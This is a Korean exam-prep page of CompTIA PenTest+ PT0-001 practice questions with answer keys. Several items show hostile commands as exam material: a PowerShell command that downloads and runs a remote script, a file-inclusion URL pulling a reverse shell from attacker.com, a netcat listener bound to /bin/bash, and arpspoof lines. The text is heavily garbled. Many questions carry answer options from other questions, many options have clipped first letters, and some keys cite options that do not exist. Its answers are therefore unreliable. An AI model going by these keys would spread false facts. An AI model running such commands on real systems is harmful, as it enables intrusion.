아무것도 놓치고 싶지 않으신가요?

인증 시험 합격 팁

최신 시험 소식 및 할인 정보

전문가가 선별하고 최신 정보를 제공합니다.

예, 뉴스레터를 보내주세요

효과적인 준비를 위한 최신 CompTIA PenTest+ PT0-001 시험 문제

CompTIA PenTest+ PT0-001시험을 준비하고 있으며 효과적인 학습 자료가 필요하신가요? 더 이상 고민하지 마세요! 우리의 포괄적인 시험 문제와 답안, 세심하게 만들어진 시험 문제, 귀중한 시험 자료는 자신감을 가지고 준비하는 데 도움이 될 것입니다. 실제 시험 환경을 시뮬레이션하도록 설계된 모의 시험은 시험 준비 전략의 필수 요소입니다. 모의고사를 통해 자신의 지식을 평가하고, 개선이 필요한 부분을 파악하고, 성공적인 합격을 위해 필요한 기술을 쌓을 수 있습니다. 전문가가 엄선한 학습 자료와 모의고사를 통해 침투 테스트의 개념, 도구, 기술을 깊이 있게 이해할 수 있습니다. 숙련된 전문가든 이제 막 사이버 보안을 시작하려는 초보자이든, 저희의 리소스는 여러분의 요구를 충족하고 시험 당일의 성공을 보장하기 위해 맞춤화되어 있습니다.
다른 온라인 시험에 응시하세요

질문 #1
다음 중 침투 테스트 참여 계약의 속성 중 가장 높은 부하에서 프로덕션 시스템을 관찰하고 테스트하는 데 가장 큰 영향을 미치는 것은?
A. 중요한 프로덕션 시스템의 범위 만들기
B. 테스트 액세스 시간 일정 설정
C. 화이트박스 테스트 참여 설정하기
D. 침입 테스트에 대한 경영진의 승인 받기
답변 보기
정답: B
질문 #2
다음 중 테스터가 케르베로스팅 공격을 수행할 수 있는 시나리오는 무엇인가요?
A. 테스터가 Windows 장치를 손상시켜 LSA 비밀을 덤프했습니다
B. 테스터는 SAM 데이터베이스를 검색하고 비밀번호 해시를 해독해야 합니다
C. 테스터가 제한된 권한을 가진 사용자를 침해했으며 측면 이동을 위해 다른 계정을 타깃으로 삼아야 합니다
D. 테스터가 계정을 손상시켰으므로 시스템에서 해시 및 일반 텍스트 비밀번호를 덤프해야 합니다
답변 보기
정답: C
질문 #3
모의 침투 테스터가 API 테스트를 준비 중입니다. 다음 중 이 참여를 준비하는 데 가장 도움이 될 만한 것은 무엇인가요?
A. ikto
B. AR
C. 3AF
D. wagger
답변 보기
정답: D
질문 #4
여러 번의 시도 끝에 공격자는 생체 인식 센서를 통해 공격자의 실제 지문을 악용하지 않고 무단 액세스를 얻을 수 있었습니다. 다음 중 이 사건에 대한 가장 가능성이 높은 설명은 무엇인가요?
A. 생체 인식 장치는 오탐에 더 가깝게 조정되어 있습니다
B. 생체 인식 장치는 진정한 네거티브에 더 가깝게 구성됩니다
C. 생체 인식 장치가 닫히지 않도록 설정되어 있습니다
D. 생체 인식 장치가 유효한 사용자의 지문을 복제했습니다
답변 보기
정답: A
질문 #5
취약성 검사에서 SSL 인증서가 호스트 이름과 일치하지 않는 것으로 확인되었지만 클라이언트는 이 결과에 대해 이의를 제기합니다. 다음 중 모의 침투 테스터가 결과의 유효성을 판단하기 위해 수행할 수 있는 기법은 무엇인가요?
A. 스캐너가 아웃바운드 DNS 요청을 할 수 있는지 확인합니다
B. 스캐너가 ARP 해상도를 수행하도록 구성되어 있는지 확인합니다
C. 캐너가 IP 호스트를 분석하도록 구성되어 있는지 확인합니다
D. 스캐너에 적절한 플러그인이 로드되어 있는지 확인합니다
답변 보기
정답: A
질문 #6
다음 중 테스터가 케르베로스팅 공격을 수행할 수 있는 시나리오는 무엇인가요?
A. 테스터가 Windows 디바이스를 손상시켜 LSA 비밀을 유출했습니다
B. 테스터는 SAM 데이터베이스를 검색하고 비밀번호 해시를 해독해야 합니다
C. 스터가 제한된 권한을 가진 사용자를 침해했으며 측면 이동을 위해 다른 계정을 타깃으로 삼아야 합니다
D. 테스터가 계정을 손상시켰으므로 시스템에서 해시 및 일반 텍스트 비밀번호를 덤프해야 합니다
답변 보기
정답: C
질문 #7
침투 테스터가 회사에서 제공한 IP 주소 목록이 포함된 텍스트 파일을 사용하여 Nmap으로 OS 핑거링을 수행하라는 요청을 받았습니다. 이 검사를 수행하려면 다음 중 어느 것이 필요합니까? (두 개 선택).
A. 렉토리 탐색
B. 차 사이트 스크립팅
C. 격 파일 포함
D. 용자 열거
답변 보기
정답: BE
질문 #8
보안 컨설턴트가 이전에 식별된 사용자 계정으로 기기를 공격하려고 합니다.다음 중 어떤 유형의 공격이 실행되고 있나요?
A. rpspoof -c both -r -t 192
B. rpspoof -t 192
C. rpspoof -c both -t 192
D. rpspoof -r -t 192
답변 보기
정답: D
질문 #9
다음 스크립트가 주어졌을 때:다음 중 이 스크립트의 목적을 가장 잘 설명하는 것은?
A. 그 수집
B. 벤트 수집
C. 입력 모니터링
D. 버그 메시지 수집
답변 보기
정답: C
질문 #10
한 회사가 매년 사내 환경에 대한 침투 테스트를 실시했습니다. 몇 가지 새로운 발견 사항 외에도 이전에 확인된 모든 발견 사항이 최신 보고서에서도 그대로 유지되었습니다. 다음 중 가장 가능성이 높은 이유는 무엇인가요?
A. 인프라는 유사한 하드웨어 및 소프트웨어로 교체되고 있습니다
B. 시스템 관리자가 잘못된 패치를 적용하고 있습니다
C. 조직이 확인된 발견 사항을 개선하기 위한 조치를 취하지 않고 있습니다
D. 모의 침투 테스트 도구가 잘못 구성되었습니다
답변 보기
정답: C
질문 #11
침투 테스터가 호스트를 손상시켰습니다. 다음 중 장치에서 Netcat 리스너를 만드는 올바른 구문은 무엇인가요?
A. c -lvp 4444 /bin/bash
B. c -vp 4444 /bin/bash
C. c -p 4444 /bin/bash
D. c -lp 4444 -e /bin/bash
답변 보기
정답: A
질문 #12
제한된 권한으로 Windows 시스템에서 지속성을 유지하려고 할 때 테스터가 사용해야 하는 레지스트리 키는 다음 중 어느 것인가요?
A. HKEY_CLASSES_ROOT
B. Hkey_local_machine
C. HKEY_CURRENT_USER
D. HKEY_CURRENT_CONFIG
답변 보기
정답: C
질문 #13
모의 침투 테스터가 공용 웹 서버에서 여러 개의 높은 번호 포트가 수신 대기 중인 것을 관찰합니다. 그러나 시스템 소유자는 애플리케이션이 포트 443만 사용한다고 말합니다. 다음 중 가장 추천할 만한 것은 무엇인가요?
A. 애플리케이션을 다른 포트로 전환합니다
B. 트 443을 특정 IP 주소로 필터링합니다
C. 애플리케이션 방화벽을 구현합니다
D. 필요한 서비스를 비활성화합니다
답변 보기
정답: D
질문 #14
평가자가 Windows 도메인 internal.comptia.net에 대한 내부 보안 테스트를 시작합니다. 평가자에게는 DHCP를 통한 네트워크 액세스 권한이 부여되지만 네트워크 맵이나 대상 IP 주소는 제공되지 않습니다. 다음 중 평가자가 Windows 도메인 컨트롤러를 찾기 위해 사용할 수 있는 명령은 무엇인가요?
A. 경로 수정을 사용하여 애플리케이션의 프레임워크를 벗어나세요
B. 애플리케이션을 오버레이하는 프레임을 만듭니다
C. 바스크립트가 포함된 악성 아이프레임을 삽입합니다
D. 악의적인 iframe 속성을 전달합니다
답변 보기
정답: A
질문 #15
내부 네트워크 침투 테스트 중에 테스터가 여러 대상 시스템에 대한 전체 관리자 권한이 있는 것으로 알려진 사용자의 NTLM 암호 해시를 복구합니다. 해시를 해독하고 일반 텍스트 암호를 복구하려는 노력은 실패했습니다.다음 중 지속적인 익스플로잇 노력에 가장 적합한 대상은 어느 것입니까?
A. 영 체제: Windows 7오픈 포트: 23, 161
B. 영 체제: 윈도우 서버 2016오픈 포트: 53, 5900
C. 영 체제: Windows 8
D. 영 체제: Windows 8오픈 포트: 514, 3389
답변 보기
정답: C
질문 #16
모의 침투 테스터가 대상 시스템에 대해 여러 취약성 검사를 실행했습니다. 다음 중 인증된 스캔에 고유한 것은 무엇인가요?
A. 견된 취약점에 대한 익스플로잇
B.
C. 치되지 않은 타사 소프트웨어
D. 약한 액세스 제어 구성
답변 보기
정답: A
질문 #17
한 회사에서 모의 침투 테스터를 고용하여 회사의 DMZ에 있는 애플리케이션에 대한 평가를 수행했습니다. 테스트를 수행하기 전에 침투 테스터의 IP 주소를 화이트리스트에 추가해야 하는 솔루션은 다음 중 어느 것입니까?
A. AF
B. IDS
C. IDS
D. LP
답변 보기
정답: C
질문 #18
컨설턴트가 식별된 장치에서 모든 TCP 포트를 스캔하려고 합니다. 다음 중 이 작업을 완료할 수 있는 Nmap 스위치는 무엇인가요?
A. p-
B. p ALL
C. p 1-65534
D. 포트 1-65534
답변 보기
정답: A
질문 #19
시뮬레이션귀하는 서버에서 포트 스캔을 실행하는 모의 침투 테스터입니다. 지침파트1: 출력이 주어지면, 사용 가능한 옵션에서 이 출력을 생성하는 데 사용된 명령을 구성합니다.2부: 명령이 적절하게 구성되면 주어진 출력을 사용하여 추가 조사해야 할 잠재적 공격 벡터를 식별합니다.언제든지 시뮬레이션의 초기 상태로 되돌리려면 모두 재설정 버튼을 클릭하세요.Part1 Part2
A. 답변은 설명 섹션을 참조하세요
답변 보기
정답: A
질문 #20
모의 침투 테스터가 코드 검토를 수행하고 있습니다. 다음 중 어떤 테스트 기법이 수행되고 있나요?
A. 적 분석
B. 징 분석
C. 적 분석
D. 타임 분석
답변 보기
정답: C
질문 #21
리눅스 시스템에 대한 초기 낮은 권한으로 접근 권한을 얻은 후, 침투 테스트자는 사용자의 홈 폴더에서 ''changepass'라는 제목의 흥미로운 바이너리를 식별합니다."-sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepass"문자열"을 사용하여 changepass에서 ASCII 인쇄 가능한 문자를 인쇄하는 테스터는 다음을 기록합니다.$ 문자열 changepassexitsetuidstrcmpGLIBC_2.0ENV_PATH%s/changepwmallocstrlen이 정보가 주어질 때 다음 중 루트 권한을 얻기 위한 가장 가능성 있는 공격 경로는 무엇이라고 생각합니까?
A. 변경 패스를 쓰기 가능한 디렉토리에 복사하고 ENV_PATH 환경 변수를 토큰을 훔치는 바이너리 경로로 내보냅니다(제목은 changepw)
B. 같은 디렉터리에 changepass의 복사본을 만들고 이름을 changepw로 지정합니다
C. NV_PATH 환경 변수를 토큰 탈취 바이너리인 changepw가 포함된 쓰기 가능한 디렉토리의 경로로 내보냅니다
D. 재 디렉터리 내에서 '/usr/local/bin' 경로로 ENV_PATH 환경 변수를 내보낸 후 sudo를 사용하여 changepass를 실행합니다
답변 보기
정답: D
질문 #22
의료 기관은 해당 개인의 개인 건강 정보를 보호하고 이를 증명하기 위해 현지 규정을 준수해야 합니다. 침투 테스터가 평가를 수행할 때 특별히 테스트해야 하는 조건은 다음 중 어느 것인가요? (2가지 선택).
A. MS 공격으로 경영진 표적화하기
B. 메일 공격으로 특정 팀 타겟팅하기
C. SB 키 드롭을 통한 무작위 사용자 타겟팅
D. 터링홀 공격으로 조직 표적화하기
답변 보기
정답: DE
질문 #23
다음 중 정적 HTML 웹 페이지에서 자동화된 스캐너가 보고할 때 오탐으로 판정될 가능성이 가장 높은 취약점은 무엇인가요? (두 개를 선택하세요.)
A. 안되지 않은 서비스 및 프로토콜 구성
B. MB 및 SMTP 서비스 실행
C. 약한 비밀번호 복잡성 및 사용자 계정
D. 못된 구성
답변 보기
정답: FG
질문 #24
다음 PowerShell 명령을 고려하십시오.powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/script.ps1";Invoke-Cmdlet다음 중 이 명령이 수행하는 작업을 가장 잘 설명하는 것은 무엇입니까?
A. 행 정책을 설정합니다
B. 원격 스크립트를 실행합니다
C. 코딩된 명령을 실행합니다
D. 체를 인스턴스화합니다
답변 보기
정답: B
질문 #25
최근 모의 침투 테스트 결과, 한 회사에서 직원들이 사전식 및 계절별 비밀번호를 사용하고 있다는 사실을 발견했습니다. 다음 중 일반적인 사전 용어 사용을 개선하기 위한 가장 좋은 제어 방법은 무엇인가요?
A. 비밀번호 길이를 7자에서 14자로 늘립니다
B. 밀번호 기록 제한을 구현합니다
C. 밀번호 필터 구성하기/
D. 5번의 잘못된 시도 후 계정을 비활성화합니다
E. 비밀번호 만료 기간을 줄입니다
답변 보기
정답: A
질문 #26
공격자가 SET를 사용하여 회사의 클라우드 호스팅 웹 메일 포털의 복사본을 만든 후 최고 경영자(CEO)가 로그인하여 CEO의 로그인 자격 증명을 얻기를 희망하는 이메일을 보냅니다. 다음 중 어느 유형의 공격의 예시인가요?
A. 유도 공격
B. 사칭 공격
C. 스피어 피싱 공격
D. 드라이브 바이 다운로드 공격
답변 보기
정답: A
질문 #27
보안 분석가가 WAF 로그를 모니터링하는 동안 다음 URL에 대한 성공적인 공격을 발견했습니다: https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.phpWhich 이러한 유형의 공격을 방지하기 위해 다음 중 어떤 해결 단계를 수행해야 하나요?
A. 블랙리스트를 구현합니다
B. RL 리디렉션을 차단합니다
C. ouble URL은 매개변수를 인코딩합니다
D. 플리케이션에서 외부 호출을 중지합니다
답변 보기
정답: B
질문 #28
한 소프트웨어 개발팀은 최근 온프레미스 환경의 새로운 애플리케이션 소프트웨어로 마이그레이션했습니다. 모의 침투 테스트 결과 여러 취약점이 존재하는 것으로 나타났습니다. 모의 침투 테스터가 라이브 환경이나 테스트 환경에 액세스할 수 없는 경우 가상 머신에 동일한 환경을 만들어 테스트하는 것이 더 나을 수 있습니다. 다음 중 확인을 위해 가장 중요한 것은 무엇인가요?
A. ashcat -m 5600 -r rules/bestG4
B. ashcat -m 5600 hash
C. ashcat -m 5600 -a 3 hash
D. ashcat -m 5600 -o results
답변 보기
정답: A
질문 #29
침투 테스터는 인프라 측면을 완료한 후 대상 회사의 직원에 대해 OSINT를 수행해야 합니다. 다음 중 모의 침투에 가장 적합한 단계는 무엇인가요?
A. 사에 전화하여 사회 공학 기법을 사용하여 직원 정보를 얻습니다
B. 객을 방문하여 사칭을 통해 직원으로부터 정보를 얻습니다
C. 푸핑된 이메일을 직원에게 보내 직원이 민감한 정보로 응답하는지 확인합니다
D. 셜 네트워킹 사이트 등 인터넷에서 직원에 대한 정보를 검색합니다
답변 보기
정답: D
질문 #30
침투 테스터가 취약점 스캔을 수행하기 전에 일부 원격 호스트에서 초기 정보 수집을 수행하고 있습니다.테스터는 다음 명령을 실행합니다.nmap -D 192.168.1.1, 192.168.1.3 -sV -o --max-rate 2 192.168.1.130다음 중 여러 IP 주소가 지정된 이유를 가장 잘 설명하는 것은 무엇입니까?
A. 네트워크는 서브넷이 25개 이상이고 테스터는 두 개의 다른 서브넷에 있는 호스트에 접속해야 합니다
B. 테스터가 여러 개의 가짜 주소를 포함시켜 더 은밀한 검사를 수행하려고 합니다
C. 캔 기계에는 지정된 속도로 스캔 요청의 균형을 맞추기 위한 여러 인터페이스가 있습니다
D. 번째 주소 집합에 대해 검색 스캔이 실행되는 반면, 후자의 호스트에 대해서는 더 심층적이고 공격적인 스캔이 실행됩니다
답변 보기
정답: B
질문 #31
모의 침투 테스터가 WPA2-PSK 보안 무선 네트워크를 모니터링하여 클라이언트와 액세스 포인트 간의 핸드셰이크를 캡처하려고 시도하고 있습니다. 테스터는 식별된 네트워크의 올바른 채널을 모니터링하고 있지만 핸드셰이크를 캡처하는 데 실패했습니다. 이 시나리오가 주어졌을 때, 다음 중 테스터가 이 핸드셰이크를 획득하는 데 가장 도움이 되는 공격은 무엇입니까?
A. 르마 공격
B. 증 해제 공격
C. 편화 공격
D. SDI 방송 홍수
답변 보기
정답: B
질문 #32
모의 침투 테스터가 애플리케이션이 인터넷 연결 애플리케이션에서 기본 인증만 사용하고 있다고 보고합니다. 다음 중 가장 좋은 해결 전략은 무엇인가요?
A. HTTP 엄격한 전송 보안을 활성화합니다
B. 보안 쿠키 플래그를 활성화합니다
C. 신 채널을 암호화합니다
D. 효하지 않은 사용자 입력을 삭제합니다
답변 보기
정답: A
질문 #33
모의 침투 테스터가 조직의 인증 서버에서 취약점을 성공적으로 익스플로잇했으며 이제 리버스 셸을 설정하려고 합니다. 모의 침투 테스터가 대상에서 Netcat을 사용할 수 없음을 발견했습니다.다음 중 다음 중 NEXT를 시도하기에 적합한 옵션은 무엇인가요?
A. term을 실행하여 대상의 X-서버에 연결합니다
B. 화형 셸을 획득하기 위해 권한을 상승시키려고 시도합니다
C. dev/tcp 소켓을 사용해보세요
D. 림자를 읽으려고 시도합니다
답변 보기
정답: C
질문 #34
사내 주니어 기술자가 침투 테스트를 수행했습니다. 테스트 중에 기술자는 웹 애플리케이션이 사용자 계정 및 비밀번호 정보가 포함된 SQL 테이블을 공개할 수 있음을 발견했습니다. 다음 중 이 발견과 그 중요성을 경영진에게 알리는 가장 효과적인 방법은 무엇인가요?
A. 웹 애플리케이션 공개에 대한 요약, 권장 사항 및 스크린샷과 함께 조사 결과를 문서화합니다
B. 정보를 사용하여 SQL 서버에 연결하고 관리자에게 개념 증명을 보여주기 위해 중요하지 않은 한두 개의 계정으로 비밀번호를 변경합니다
C. 발팀에 발견 사실을 알리고 전문 모의 침투 테스트 업체에 입력 검증을 의뢰할 것을 제안합니다
D. 경영진에게 전문 침투 테스트 회사와의 공식적인 계약을 시작하기 위해 RFP를 작성하도록 요청합니다
답변 보기
정답: A
질문 #35
드래그 앤 드롭 관리자는 테스터에게 다음 Python 스크립트 내에서 문제를 진단하는 데 도움을 요청합니다.#!/usr/bin/pythons = "관리자"테스터는 문자열 조각화 및 조작에 문제가 있는 것으로 의심합니다. 다음 코드 세그먼트를 분석하고 각 문자열 조작에 대한 올바른 출력을 해당 코드 세그먼트로 끌어다 놓습니다. 옵션은 한 번만 사용하거나 전혀 사용하지 않을 수 있습니다.선택하고 배치합니다:
A. 답변은 설명 섹션을 참조하세요
답변 보기
정답: A
질문 #36
보안 분석가에게 조직의 DMZ 환경에 대해 수행된 상세한 침투 보고서가 제공되었습니다. 보고서에는 발견된 취약점의 CVSS 기본 점수가 10.0이라고 명시되어 있었습니다. 이 취약점을 익스플로잇하려면 다음 중 어느 정도의 난이도가 필요하나요?
A. 매우 어렵습니다
B. 다소 어려움; 악용하려면 상당한 처리 능력이 필요합니다
C. rivial; 이 발견을 악용하는 데는 거의 노력이 필요하지 않습니다
D. 부 호스트는 공격으로부터 보호하기 위해 강화되었습니다
답변 보기
정답: C
질문 #37
블랙박스 침투 테스트 전략은 테스터에게 다음을 제공합니다:
A. 상 목록
B. 네트워크 다이어그램
C. 스 코드
D. 한 있는 자격 증명
답변 보기
정답: D
질문 #38
모의 침투 테스트자는 IT 부서 구성원을 피싱하여 초기 VPN 사용자 도메인 자격 증명을 검색할 수 있었습니다. 그 후, 침투 테스터는 VPN을 통해 해시를 획득하고 사전 공격을 사용하여 쉽게 해시를 크래킹했습니다. 다음 중 어떤 해결 단계가 권장되나요? (3개 선택).
A. 드웨어 공급업체
B. 널 간섭
C. 용자 이름
D. 요 강점
답변 보기
정답: BCG
질문 #39
다음 중 기업 정책에서 발췌한 내용은 어느 것입니까?
A. 직원 비밀번호는 영숫자를 포함하여 최소 8자 이상이어야 하며, 1자는 영문자이어야 합니다
B. 헬프 데스크에 800-passwd1로 연락하여 비밀번호 재설정을 수행할 수 있습니다
C. 직원은 회사 자산에 액세스할 때 강력한 비밀번호를 사용해야 합니다
D. 회사 시스템은 MD5 해싱 알고리즘을 사용하여 비밀번호를 저장해야 합니다
답변 보기
정답: D
질문 #40
모의 침투 테스트자가 마케팅 직원의 디바이스에 액세스했습니다. 모의 침투 테스터는 액세스가 발견되면 디바이스의 제어권을 되찾을 수 있는지 확인하려고 합니다. 다음 중 침투 테스터가 디바이스에 대한 지속성을 유지하기 위해 사용해야 하는 조치는 무엇인가요? (2개를 선택하세요.)
A. ydra
B. 더 리퍼
C. 시캣
D. each
답변 보기
정답: AC
질문 #41
약혼을 계획할 때 다음 중 가장 중요한 것은 무엇인가요? (두 개 선택).
A. 포트 스캔을 수행합니다
B. 웹 서버의 배너를 가져옵니다
C. TY를 원격 시스템으로 리디렉션합니다
D. 공된 IP에 대한 오류 로그를 제거합니다
답변 보기
정답: AC
질문 #42
모의 침투 테스터가 서버 팜이 회사의 소프트웨어 기준선을 준수하는지 확인하기 위해 원격 스캔을 수행 중입니다. 다음 중 모의 침투 테스터가 기준 준수를 확인하기 위해 수행해야 하는 작업은 무엇인가요?
A. 스커버리 스캔
B. 텔스 스캔
C. 체 스캔
D. 격증명 스캔
답변 보기
정답: A
질문 #43
모의 침투 테스터는 웹 애플리케이션 취약점 스캔 보고서를 클라이언트에 전달합니다. 모의 침투 테스터가 취약점을 중간 심각도로 평가합니다. 이전 보고서에서 동일한 취약점이 심각도 높음으로 보고되었습니다. 다음 중 심각도가 낮아진 가장 가능성이 높은 이유는 무엇인가요?
A. 클라이언트가 버전을 업데이트하지 않고 핫픽스를 적용했습니다
B. 위협 환경이 크게 변화했습니다
C. 클라이언트가 새로운 기능으로 코드베이스를 업데이트했습니다
D. 재 이 취약점에 대한 익스플로잇은 알려진 바가 없습니다
답변 보기
정답: A
질문 #44
모의 침투 테스터인 조는 회사 사무실에 접근하여 회사의 물리적 보안을 평가해 달라는 요청을 받았습니다. 조는 업무 시간 중이나 현장에 직원이 없을 때 건물에 들어갈 수 있는 방법을 찾고 있습니다. 다음 중 이를 수행하는 데 가장 효과적인 방법은 무엇인가요?
A. 배지 복제
B. 금 피킹
C. 일게이팅
D. 기백
답변 보기
정답: A
질문 #45
모의 침투 테스터가 다른 네트워크의 새 Linux 디바이스로 피벗을 수행했습니다. For m in {1..254..1};do ping -c 1 192.168.101.$m; done다음 중 이 명령을 실행한 결과를 가장 잘 설명하는 것은?
A. 트 스캔
B. 비스 열거
C. ive 호스트 식별
D. 비스 거부
답변 보기
정답: C
질문 #46
컨설턴트가 고객을 대상으로 소셜 엔지니어링 공격을 수행하고 있습니다. 컨설턴트는 피싱 캠페인을 사용하여 다수의 사용자 이름과 비밀번호를 수집할 수 있었습니다. 컨설턴트에게는 다양한 직원 이메일 계정에 로그인할 수 있는 자격 증명이 주어졌습니다. 이 결과를 감안할 때 컨설턴트는 다음 중 어떤 조치를 취해야 하나요?
A. 력한 비밀번호 정책
B. 밀번호 암호화
C. 메일 시스템 강화
D. 중 인증
답변 보기
정답: D
질문 #47
다음 중 보안 평가의 예산에 직접적이고 중대한 영향을 미치는 것은 무엇인가요?
A. 위 설정
B. 케줄링
C. 정 준수 요구 사항
D. 상 위험
답변 보기
정답: D
질문 #48
한 모의 침투 테스터가 스타트업 회사에 대한 보안 평가를 수행했습니다. 보고서에는 총 10개의 취약점이 나열되어 있으며 5개의 취약점이 심각한 것으로 확인되었습니다. 고객은 모든 취약점을 즉시 수정할 수 있는 리소스가 없습니다. 이러한 상황에서 다음 중 고객에게 가장 적합한 제안은 무엇인가요?
A. 지속성을 제거하려면
B. 지속성을 활성화하려면
C. 속성 보고하기
D. 속성을 확인하려면
답변 보기
정답: D
질문 #49
모의 침투 테스터는 웹 애플리케이션 취약점 스캔 보고서를 클라이언트에 전달합니다. 모의 침투 테스터가 취약점을 중간 심각도로 평가합니다. 이전 보고서에서 동일한 취약점이 심각도 높음으로 보고되었습니다. 다음 중 심각도가 낮아진 가장 가능성이 높은 이유는 무엇인가요?
A. 클라이언트가 버전을 업데이트하지 않고 핫픽스를 적용했습니다
B. 위협 환경이 크게 변화했습니다
C. 클라이언트가 새로운 기능으로 코드베이스를 업데이트했습니다
D. 현재 이 취약점에 대한 알려진 익스플로잇은 없습니다
답변 보기
정답: A
질문 #50
회사에 대한 외부 침투 평가를 수행하기 위해 침투 테스터가 배정되었습니다. 다음 중 수동 정보 수집 프로세스에 가장 도움이 되는 단계는 무엇인가요? (두 가지를 선택하세요.)
A. cript 어린이
B. PT 행위자
C. 부자 위협
D. 티비스트 그룹
답변 보기
정답: DE
질문 #51
침투 테스터가 텍스트 상자에 SQL 인젝션 명령을 입력하여 데이터베이스의 정보 저장소에 액세스할 수 있었습니다. 다음 중 이 취약점을 완화할 수 있는 최선의 권장 사항은 무엇인가요?
A. 로그인에 사용되는 자격 증명을 무작위로 지정합니다
B. 스트 기반 침입 탐지를 설치합니다
C. 력 정규화를 구현합니다
D. 시스템 강화를 수행합니다
답변 보기
정답: D
질문 #52
다음 중 기업 정책에서 발췌한 내용은 어느 것입니까?
A. 직원 비밀번호는 영숫자를 포함하여 최소 8자 이상이어야 합니다
B. 헬프 데스크에 800-passwd1로 연락하여 비밀번호 재설정을 수행할 수 있습니다
C. 직원들은 회사 자산에 액세스할 때 강력한 비밀번호를 사용해야 합니다
D. 회사 시스템은 MD5 해싱 알고리즘을 사용하여 비밀번호를 저장해야 합니다
답변 보기
정답: D
질문 #53
모의 침투 테스터가 은행 애플리케이션을 테스트하다가 취약점을 발견했습니다. 테스터는 데이터에 액세스할 수 없는 비권한 사용자로 로그인되어 있습니다. 웹 차단 프록시의 아래 데이터가 주어졌을 때:다음 중 어떤 유형의 취약점이 악용되고 있나요?
A. 제 브라우징 취약점
B. 개변수 오염 취약성
C. 일 업로드 취약점
D. 키 열거
답변 보기
정답: D
질문 #54
악의적인 사용자가 컴퓨터에 대해 MITM 공격을 수행하려고 합니다. 컴퓨터 네트워크 구성은 다음과 같습니다.IP: 192.168.1.20넷마스크: 255.255.255.0기본 게이트웨이: 192.168.1.254dhcp: 192.168.1.253dns: 192.168.10.10, 192.168.20.10다음 중 악성 사용자가 MITM 공격을 수행하기 위해 실행해야 하는 명령은 무엇인가요?
A. 이트리스트는 IPS 및 지원 로그 모니터링 시스템에 대한 의도하지 않은 DoS 공격을 방지합니다
B. 타사 IPS 시스템에 대한 침투 테스트에는 종종 추가 문서와 승인이 필요하므로 시간이 촉박한 테스트가 지연될 수 있습니다
C. PS 화이트리스트 규칙은 지속적으로 개발되는 취약점과 새로 발견된 취약점을 최신 상태로 유지하기 위해 자주 업데이트해야 합니다
D. 스트는 범위 내 모든 시스템에서 발생할 수 있는 보안 문제를 발견하는 데 초점을 맞춰야 하며, IPS와 같은 능동적 방어의 상대적 효과를 판단하는 데 초점을 맞춰서는 안 됩니다
답변 보기
정답: B
질문 #55
침투 테스터가 도메인 컨트롤러에 대한 전체 셸을 가지고 있으며 21일 동안 도메인에 인증되지 않은 모든 사용자 계정을 찾으려고 합니다. 다음 중 이 작업을 가장 잘 수행할 수 있는 명령은 무엇인가요?
A. srm -users "DN=company
B. suser -name -계정 -limit 3
C. squery 사용자 -비활성 3
D. squery -o -rdn -limit 21
답변 보기
정답: D
질문 #56
다음 중 물리적 보안 평가 중 '언더 더 도어 도구'를 사용하는 침입 기법의 예는 무엇인가요?
A. 영향을 받는 서비스의 네트워크 포트를 비활성화합니다
B. 모든 조사 결과를 작성한 다음 고객에게 제출합니다
C. 발견한 내용을 고객에게 즉시 알립니다
D. 격자가 악용할 수 없도록 대상을 오프라인 상태로 전환합니다
답변 보기
정답: D
질문 #57
클라이언트가 모의 침투 테스터에게 현재 진행 중인 테스트에 주소를 더 추가해 달라고 요청합니다. 다음 중 대상 목록을 정의하는 것은 무엇인가요?
A. 여 규칙
B. ater 서비스 계약
C. 업 내역서
D. 종 사용자 라이선스 계약
답변 보기
정답: C
질문 #58
모의 침투 테스트가 아웃바운드 포트에서 수신 대기 중인 것으로 보이는 DMZ 서버를 성공적으로 익스플로잇합니다. 모의 침투 테스터는 해당 트래픽을 디바이스로 다시 전달하고자 합니다. 이 목적으로 사용하기에 가장 적합한 도구는 다음 중 어느 것인가요? (두 가지를 선택하세요.)
A. ig -q any _kerberos
A. et
B. ig -q any _lanman
A. et
C. ig -q any _ntlm
A. et
D. ig -q any _smtp
A. et
답변 보기
정답: BD
질문 #59
침투 테스터가 회사에서 제공한 IP 주소 목록이 포함된 텍스트 파일을 사용하여 Nmap으로 OS 핑거링을 수행하라는 요청을 받았습니다. 이 검사를 수행하려면 다음 중 필요한 것은 무엇인가요? (두 개를 선택하세요.)
A. 로데이 익스플로잇을 실행합니다
B. 알려진 비밀번호로 새 도메인 사용자를 만듭니다
C. 백을 인스턴스화하도록 알려진 부팅 시간 서비스를 수정합니다
D. 해된 사용자의 클리어텍스트 자격 증명을 확보합니다
답변 보기
정답: AB
질문 #60
모의 침투 테스터가 외부 취약점 스캔 중에 다음과 같은 결과를 확인했습니다.위의 스캔 결과에서 우선순위를 정해야 하는 공격 전략은 다음 중 어느 것입니까?
A. 록
B. 영진 요약
C. 술 요약
D. 체
답변 보기
정답: D
질문 #61
소비자 기반 IoT 디바이스는 기존 데스크톱 컴퓨터용으로 구축된 시스템보다 보안이 취약한 경우가 많습니다. 다음 중 그 이유를 가장 잘 설명하는 것은 무엇인가요?
A. sfconsole
B. 업 공간
C. sfvenom
D. b_init
E. b_connect
답변 보기
정답: A
질문 #62
드래그 드랍표시된 문자 집합을 기준으로 가장 복잡한(1)부터 가장 복잡한(4) 순서로 다음 각 비밀번호를 복잡도가 낮은 순서대로 배치합니다. 각 비밀번호는 한 번만 사용할 수 있습니다.선택하고 배치합니다:
A. 답변은 설명 섹션을 참조하세요
답변 보기
정답: A
질문 #63
한 고객이 영업 기밀을 노리는 원격 공격자에 의해 침해를 당하는 기업이 늘어나고 있다고 우려를 표명했습니다. 다음 중 이를 통해 식별할 수 있는 공격자의 유형을 가장 잘 설명하는 것은 무엇인가요?
A. 동적 코드 분석기를 통해 애플리케이션을 실행합니다
B. 퍼징 유틸리티를 사용합니다
C. 플리케이션을 디컴파일합니다
D. 모리 할당량을 확인합니다
답변 보기
정답: B
질문 #64
한 에너지 회사가 보안 회사와 계약을 맺고 발전 및 냉각 관리를 위해 ICS를 사용하는 발전소에 대한 침투 테스트를 수행하기로 했습니다. 다음 중 이 회사가 평가를 준비할 때 고려해야 하는 이러한 환경의 고유한 고려 사항은 무엇인가요?
A. 절한 보안 테스트 도구 세트의 선택
B. CS 구성 요소의 전류 및 부하 정격
C. 영 및 안전 위험 가능성
D. 스트에 사용된 하드웨어의 전기 인증
답변 보기
정답: A
질문 #65
